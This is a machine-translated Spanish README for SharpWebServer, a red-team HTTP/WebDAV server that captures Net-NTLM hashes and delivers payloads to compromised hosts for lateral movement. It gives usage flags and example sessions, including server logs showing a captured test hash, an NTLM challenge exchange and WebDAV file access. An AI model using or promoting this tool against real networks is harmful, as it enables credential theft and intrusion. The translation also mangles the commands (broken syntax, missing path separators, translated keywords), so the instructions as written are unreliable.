SharpWebServer es un equipo rojo orientado simple HTTP y WebDAV Servidor escrito en C # con funciones para capturar hashes Net-NTLM. Proporcionar cargas útiles en máquinas comprometidas con fines de movimiento lateral.
Requiere .NET Framework 4.5 y System.Net y System.Net.Sockets Referencias.
usar
:: SharpWebServer ::
un servidor HTTP simple C # orientado al equipo rojo con funcionalidad de captura de hashes Net-NTLMv1 / 2
Autores:
– Can Güney Aksakalli (github.com/aksakalli) – implementación original
– harrypatrick442 (github.com/harrypatrick442) – horquilla y cambios aksakallis
– Dominic Chell (@domchell) de MDSec – Código de captura de hash Net-NTLMv2 tomado de Farmer
– Mariusz B. / mgeeky, – todos los módulos combinados entre sí,
Se agregó el mantenimiento de conexión para la autenticación NTLM
Usar:
SharpWebServer.exe [dir=path] [verbose=true] [ntlm=true] [logfile=path]
Opciones:
puerto: número de puerto TCP que está escuchando (1-65535)
dir: directorio con los archivos que se van a alojar.
verbose: activa el modo detallado.
Segundos: cuánto tiempo debe funcionar el servidor. Estándar: indefinidamente
ntlm: requiere autenticación NTLM antes de entregar archivos. Útil para recopilar hashes NetNTLMv2
(en el estilo Farmer de MDSec)
logfile: ruta al archivo de registro de salida.
ejemplo
Ejemplo del caso de uso que proporciona archivos y recopila hashes Net-NTLM al mismo tiempo:
servidor
C:> Puerto SharpWebServer.exe = 8888 dir = C: Windows Temp verbose = true ntlm = true
:: SharpWebServer ::
un servidor C # Simple HTTP y WebDAV orientado al Red Team con funcionalidad de captura de hashes Net-NTLM
[.] Sirviendo el servidor HTTP en el puerto: 8888
[.] Funciona así de largo: 60 segundos
[.] Modo detallado habilitado.
[.] Modo NTLM activado.
[.] Suministro de archivos del directorio: C: Windows Temp
SharpWebServer [29.03.21, 17:55:14] NTLM: Enviar 401 no autorizado debido a que falta el encabezado de autorización.
SharpWebServer [29.03.21, 17:55:14] :: 1 – «OBTENER /test.txt» – longitud: 0 (401)
SharpWebServer [29.03.21, 17:55:14] NTLM: envíe 401 no autorizado con respuesta de desafío NTLM.
SharpWebServer [29.03.21, 17:55:14] :: 1 – «OBTENER /prueba.txt» – longitud: 0 (401)
[+] SharpWebServer: hash NTLM neto capturado:
TestUser ::: 1122334455667788: 66303EE2DF9417E2FE07E1B7FD663205:
SharpWebServer [29.03.21, 17:55:14] :: 1 – «GET /test.txt» – longitud: 11 (200)
cliente
C:> curl -sD- http: // localhost: 8888 / test.txt –ntlm –negotiate -u TestUser: TestPassword
HTTP / 1.1 401 no autorizado
Transferencia de codificación: fragmentado
Autenticación WWW: NTLM
Fecha: lun, 29 de marzo de 2021 3:55:14 PM GMT
HTTP / 1.1 401 no autorizado
Transferencia de codificación: fragmentado
WWW-Authenticate: NTLM TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA + AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA ==
Fecha: lun, 29 de marzo de 2021 3:55:14 PM GMT
HTTP / 1.1 200 OK
Longitud del contenido: 6
Tipo de contenido: texto / simple
Fecha: lun, 29 de marzo de 2021 3:55:14 PM GMT
foobar
Cliente WebDAV
C:> dir localhost @ 8888 test
El volumen en la unidad localhost @ 8888 test no tiene etiqueta.
El número de serie del volumen es 0000-0000
Directorio de localhost @ 8888 test
30/03/2021 5:12 AM.
30/03/2021 5:12 AM ..
30/03/2021 4:27 AM 11 test2.txt
30/03/2021 05:12 12 test3.txt
30/03/2021 5:12 AM test4
2 archivo (s) 23 bytes
3 Directorio (s) 225268776 960 bytes libres
C:> Ingrese localhost @ 8888 test test4 test5.txt
¡Hola Mundo!
C:> copiar localhost @ 8888 test test4 test5.txt.
1 archivo (s) copiado.